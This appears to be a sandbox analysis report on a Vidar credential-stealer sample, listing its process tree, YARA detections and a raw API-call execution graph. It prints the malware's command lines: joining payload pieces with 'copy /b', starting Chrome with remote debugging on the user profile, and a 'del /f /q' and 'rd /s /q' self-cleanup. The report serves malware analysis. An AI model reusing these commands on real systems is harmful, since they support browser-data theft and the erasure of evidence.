                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                  Start time:00:21:00
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                  Start time:00:21:00
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:Dry.com b
                                                                                                                                                                                                                                                                                  Imagebase:0xae0000
                                                                                                                                                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                  Start time:00:21:00
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                  Imagebase:0x6d0000
                                                                                                                                                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                  Start time:00:21:32
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                                  Start time:00:21:33
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                  Start time:00:22:16
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit
                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                  Start time:00:22:16
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                  Start time:00:22:17
                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:17.8%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:21%
                                                                                                                                                                                                                                                                                    Total number of Nodes:1482
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                    execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW 